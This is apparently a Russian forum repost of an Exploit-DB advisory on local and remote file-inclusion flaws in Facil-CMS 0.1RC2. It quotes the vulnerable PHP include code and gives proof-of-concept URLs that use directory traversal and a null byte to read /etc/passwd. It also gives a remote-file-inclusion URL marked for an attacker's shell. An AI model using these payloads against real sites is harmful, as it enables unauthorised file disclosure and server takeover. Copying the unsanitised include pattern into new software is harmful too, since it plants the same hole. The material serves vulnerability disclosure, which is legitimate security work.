- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12061
- Проверка EDB
-
- Пройдено
- Автор
- EIDELWEISS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-7176
- Дата публикации
- 2010-04-04
Код:
########################################################
Facil-CMS (LFI/RFI) Vulnerability
########################################################
[+]Title : Facil-CMS Multiple Vulnerability
[+]Version: 0.1RC2
[+]Download: http://sourceforge.net/projects/facil-cms/files/
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s To: all friends
########################################################
-=[ Vuln C0de ]=-
***********************
[-]facil-cms/index.php
require_once('config.inc.php');
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
$config = new facilConfig();
$utils = new facilUtils();
if($utils->is_module($config->getSiteIndex()))
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');
***********************
[-]facil-cms/modules.php
require_once('config.inc.php');
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
if($_POST['modload'] && !eregi("/", $_POST['modload']))
{
$_MODLOAD = trim($_POST['modload']);
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
{
$FILELOAD = trim($_POST['fileload']);
$_MODLOAD = false;
$FILELOAD = false;
if($_POST['admload'] && !eregi("/", $_POST['admload']))
{
$_ADMLOAD = trim($_POST['admload']);
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
$_ADMLOAD = false;
$FILELOAD = false;
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');
*******************
[-]facil-cms/includes/facil-settings.php
if(!isset($_SESSION['FACIL_LANGUAGE']))
{
$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
}
require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');
*******************
-=[ Proof Of Concept ]=-
http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00
Similar reference:
http://www.exploit-db.com/exploits/5792
http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00
http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]
########################################################- Источник
- www.exploit-db.com
